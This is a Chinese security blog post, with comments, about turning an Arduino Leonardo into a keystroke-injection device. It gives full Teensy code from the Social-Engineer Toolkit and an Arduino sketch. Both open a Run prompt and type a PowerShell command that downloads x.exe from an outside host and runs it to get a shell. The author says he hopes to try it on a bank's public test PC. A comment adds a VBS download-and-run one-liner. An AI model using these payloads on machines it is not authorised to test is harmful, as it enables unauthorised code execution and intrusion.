[极客有意思]使用arduino进行渗透测试

2012-11-10 534804人围观 ,发现 58 个不明物体 极客终端安全

Arduino 是一款便捷灵活、方便上手的开源电子原型平台,包含硬件(各种型号的arduino板)和软件(arduino IDE)。它适用于艺术家、设计师、爱好者和对于“互动”有兴趣的朋友们。arduino官网:http://www.arduino.cc/

这个渗透思想源于前两周去银行更换U盾。

银行办理业务的地方都会有一个测试U盾的PC,用于检验U盾和激活,我运气比较背,正好碰上一个坏的。U盾插上后会自动启动一些应用,那么我们也可以做这样一个东西来启动并执行我们想要东西。

U盘中的autorun.inf可以做到。arduino也可以做到。
在做机器人的时候买了并了解了arduino,做机器人主要是为了拍妹纸。

arduino的板子种类也比较多。我使用的是arduino leonardo.

 

现在用它来做渗透。
主要思想是用它来做一个能自动敲东西的键盘。

Social-Engineer Toolkit有这个功能,不过它使用的是teensy这个板子,很小,和arduino leonardo都是使用的 ATMEGA32U4芯片。

这两天我一直在尝试将set生成的代码直接弄到arduino leonardo上运行,不会编程,没有成功。

不过我还是用set,这样可以少敲横多命令。

 

他生成了teensy代码

//
// Social-Engineer Toolkit Teensy Attack Vector
// Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG)
//
// Special thanks to: Irongeek
//
// 2011-02-28 padzero@gmail.com
// * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets
// * Change path from C:\ to %HOMEPATH%: Fixed payload execution on Windows 7
//


char convert[4] = "000"; // do not change this
char command1[] = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://10.1.1.172/x.exe';$file = ' %HOMEPATH%\\x.exe ';$clnt.DownloadFile($url,$file);";
char command2[] = "%HOMEPATH%\\x.exe";

void setup() { 
    delay(5000);
    omg(command1);
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    delay(15000);
    // run this executable
    omg(command2);
    delay(2000);
    Keyboard.set_modifier(MODIFIERKEY_CTRL);
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    Keyboard.set_modifier(0); 
    Keyboard.set_key1(0); 
    Keyboard.send_now(); 
    delay(1000000);
  }
void loop() {}

void ascii_type_this(char *string)
{
  int count, length;
  length = strlen(string);
  for(count = 0 ; count < length ; count++)
  {
    char a = string[count];
    ascii_input(ascii_convert(a));
  }
}

void ascii_input(char *string)
{
  if (string == "000") return;
  int count, length;
  length = strlen(string);
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.send_now();
  for(count = 0 ; count < length ; count++)
  {
    char a = string[count];
    if (a == '1') Keyboard.set_key1(KEYPAD_1);
    if (a == '2') Keyboard.set_key1(KEYPAD_2);
    if (a == '3') Keyboard.set_key1(KEYPAD_3);
    if (a == '4') Keyboard.set_key1(KEYPAD_4);
    if (a == '5') Keyboard.set_key1(KEYPAD_5);
    if (a == '6') Keyboard.set_key1(KEYPAD_6);
    if (a == '7') Keyboard.set_key1(KEYPAD_7);
    if (a == '8') Keyboard.set_key1(KEYPAD_8);
    if (a == '9') Keyboard.set_key1(KEYPAD_9);
    if (a == '0') Keyboard.set_key1(KEYPAD_0);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    delay(11);
    Keyboard.send_now();
  }
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

char* ascii_convert(char string)
{
  if (string == 'T') return "84";
  if (string == ' ') return "32";
  if (string == '!') return "33";
  if (string == '\"') return "34";
  if (string == '#') return "35";
  if (string == '$') return "36";
  if (string == '%') return "37";
  if (string == '&') return "38";
  if (string == '\'') return "39";
  if (string == '(') return "40";
  if (string == ')') return "41";
  if (string == '*') return "42";
  if (string == '+') return "43";
  if (string == ',') return "44";
  if (string == '-') return "45";
  if (string == '.') return "46";
  if (string == '/') return "47";
  if (string == '0') return "48";
  if (string == '1') return "49";
  if (string == '2') return "50";
  if (string == '3') return "51";
  if (string == '4') return "52";
  if (string == '5') return "53";
  if (string == '6') return "54";
  if (string == '7') return "55";
  if (string == '8') return "56";
  if (string == '9') return "57";
  if (string == ':') return "58";
  if (string == ';') return "59";
  if (string == '<') return "60";
  if (string == '=') return "61";
  if (string == '>') return "62";
  if (string == '?') return "63";
  if (string == '@') return "64";
  if (string == 'A') return "65";
  if (string == 'B') return "66";
  if (string == 'C') return "67";
  if (string == 'D') return "68";
  if (string == 'E') return "69";
  if (string == 'F') return "70";
  if (string == 'G') return "71";
  if (string == 'H') return "72";
  if (string == 'I') return "73";
  if (string == 'J') return "74";
  if (string == 'K') return "75";
  if (string == 'L') return "76";
  if (string == 'M') return "77";
  if (string == 'N') return "78";
  if (string == 'O') return "79";
  if (string == 'P') return "80";
  if (string == 'Q') return "81";
  if (string == 'R') return "82";
  if (string == 'S') return "83";
  if (string == 'T') return "84";
  if (string == 'U') return "85";
  if (string == 'V') return "86";
  if (string == 'W') return "87";
  if (string == 'X') return "88";
  if (string == 'Y') return "89";
  if (string == 'Z') return "90";
  if (string == '[') return "91";
  if (string == '\\') return "92";
  if (string == ']') return "93";
  if (string == '^') return "94";
  if (string == '_') return "95";
  if (string == '`') return "96";
  if (string == 'a') return "97";
  if (string == 'b') return "98";
  if (string == 'c') return "99";
  if (string == 'd') return "100";
  if (string == 'e') return "101";
  if (string == 'f') return "102";
  if (string == 'g') return "103";
  if (string == 'h') return "104";
  if (string == 'i') return "105";
  if (string == 'j') return "106";
  if (string == 'k') return "107";
  if (string == 'l') return "108";
  if (string == 'm') return "109";
  if (string == 'n') return "110";
  if (string == 'o') return "111";
  if (string == 'p') return "112";
  if (string == 'q') return "113";
  if (string == 'r') return "114";
  if (string == 's') return "115";
  if (string == 't') return "116";
  if (string == 'u') return "117";
  if (string == 'v') return "118";
  if (string == 'w') return "119";
  if (string == 'x') return "120";
  if (string == 'y') return "121";
  if (string == 'z') return "122";
  if (string == '{') return "123";
  if (string == '|') return "124";
  if (string == '}') return "125";
  if (string == '~') return "126";
  Keyboard.print(string);
  return "000";
}

void release_keys()
{
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(100);
}

void send_keys(byte key, byte modifier)
{
  if(modifier)
    Keyboard.set_modifier(modifier);
  Keyboard.set_key1(key);
  Keyboard.send_now();
  delay(100);
  release_keys();   
}

void omg(char *SomeCommand)
{
  Keyboard.set_modifier(128); 
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now(); 
  Keyboard.set_modifier(0); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
  delay(1500);
  ascii_type_this(SomeCommand);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}
由于两个设备代码不能共享,我自己写了新的代码。
char ctrlKey = KEY_LEFT_GUI;//win键
void setup() {
  Keyboard.begin();
}

void loop() {
  delay(500);
  delay(1000);
  delay(1000);
   Keyboard.press(ctrlKey);
   Keyboard.press('r');
   delay(100);
   Keyboard.release(ctrlKey);
   Keyboard.release('r');
   delay(1000);
   delay(1000);
   Keyboard.print("cmd");
   Keyboard.println();
   delay(1000);
   Keyboard.write(KEY_RETURN);
   delay(2000);
   Keyboard.write(KEY_LEFT_SHIFT);
   delay(500);
   Keyboard.print("powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://10.1.1.172/x.exe';$file = ' C:\\x.exe ';$clnt.DownloadFile($url,$file);");
   delay(100);
   Keyboard.println();
   delay(2000);
   Keyboard.print("C:\\x.exe");
   delay(100);
   Keyboard.println();
   while(1){};
}
将代码通过arduino IDE编译后写入硬件。

测试了下set没有启动httpd服务,我自己去生成一个马儿并启动httpd服务

插上arduino

在windows server 2008 R2上自动启动cmd。

自动“敲”入并执行命令

成功获得shell.

目前的arduino板子中只有leonardo支持keyboard,
其他好像也是可以支持的,使用virtual-usb-keyboard这个没有测试不知道成功与否。 

银行放在外面的那个PC使用powershell做wget使用的方式还没法搞,XP没有powershell。不过有IE,有机会去试一试。

这些评论亮了

  • BinAry (3级) 研究2.4GHz无线网络安全、RFID安全、NFC安全以及移... 回复
    Talk is cheap。
    支持这种共享精神,这些玩法也很值得深入扩展。
    后面的下载执行可以采用vbs。毕竟powershell只在vista以上系统才自带。
    )13( 亮了
  • BinAry (3级) 研究2.4GHz无线网络安全、RFID安全、NFC安全以及移... 回复
    @BinAry 
    echo Set x= createObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >get.vbs
    用法:cscript get.vbs http://xxoo.com/xxoo x.exe
    )12( 亮了
发表评论

已有 58 条评论

取消
Loading...
css.php